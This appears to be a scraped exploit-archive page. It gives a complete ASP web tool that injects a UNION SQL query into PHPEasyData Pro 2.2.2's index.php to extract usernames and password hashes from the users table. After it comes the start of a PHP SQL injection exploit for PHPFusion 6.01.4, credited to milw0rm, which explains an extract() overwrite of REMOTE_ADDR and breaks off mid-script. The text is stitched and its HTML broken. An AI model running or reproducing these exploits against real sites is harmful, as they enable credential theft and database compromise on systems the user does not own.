008000"> <center> <font face="Verdana" size="2" color="#008000"><b><a href="exploit3.asp" >PHPEasyData Pro </b>v2.2.2 (index.php) <u><b> Remote SQL Injection Exploit</b></u></a></font><br><br> <table border="1" cellpadding="0" cellspacing="0" style="border- collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style. background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</fon t>Example:[http://x.com/path]</b></font><p> <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b> <font face="Arial" size="1"><b>Example:[User ID=1]</b></font></td> <td width="50%"><center> <form method="post" name="form1" action="exploit3.asp?islem=get"> <input type="text" name="text1" value="http://" size="25" style="backgroun d- color: #808080"><br><input type="text" name="id" value="5" size="25" styl e="background-color: #808080"> <input type="submit" value="Get"></center></td> </tr> </table> <div id=htmlAlani></div> <% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>" End If If islem = "hata2" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>" End If If islem = "hata3" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Add ""http://""</font>" End If %> <% If islem = "get" Then string1="/index.php?cat=-1%20union%20" string2="select%200,concat(user_login,char(32)" string3=",user_pass),0,0," string4="0%20from%20an_users%" string5="20where%20user_id%20" string6="like%20" string7=Request.Form("id") string8="/*" targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit3.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit3.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit3.asp?islem=hata3") Else %> <% target1 = targettext+string1+string2+string3+string4+string5+string6+string7 +string8 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username,"""box-content"">" ) username=Mid(get_username,getdata+14,60) %> <center> <font face="Verdana" size="2" color="#008000"> <u><b> ajann<br></b></u></font> <table border="1" cellpadding="0" cellspacing="0" style="border- collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style. background='#808080';" onmouseout="javascript:this.style.background='#80 8000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;&nbsp; <b><font size="2" face="Arial">Data:</font></b></td> <td width="80%"> &nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=guvenlik( username)%></b></font></p> </td> </tr> </table> <form method="POST" name="form2" action="#"> <input type="hidden" name="field1" size="20" value="<%=username%>">< /p> </form> </center> <script language="JavaScript"> write() functionControl1() </script> </body> </html> <% End If End If End If End If Set objtake = Nothing %> # milw0rm.com [2006-10-29] sexyvirus(HCE) PHPFusion <= 6.01.4 sql injection exploit Code: #!/usr/bin/php -q -d short_open_tag=on <? print_r(' PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit by rgod rgod@autistici.org site: http://retrogod.altervista.org '); /* works with register globals = *Off* magic_quotes_gpc = Off explaination: vulnerable code in maincore.php at lines 15-21: if (ini_get('register_globals') != 1) { $supers = array("_REQUEST","_ENV","_SERVER","_POST","_GET","_COOKIE","_SES SION","_FILES","_GLOBALS"); foreach ($supers as $__s) { if ((isset($$__s) == true) && (is_array($$__s) == true)) extract($$__s, EXTR_OVERWRITE); } unset($supers); } extract() function can be sometimes a security hazard, in this case it allows to overwrite some arrays like _SERVER[] one and launch an sql injection attack, ex: http://[target]/[path]/news.php?_SERVER[REMOTE_ADDR]='[SQL] other attacks may be possible */ if ($argc<3) {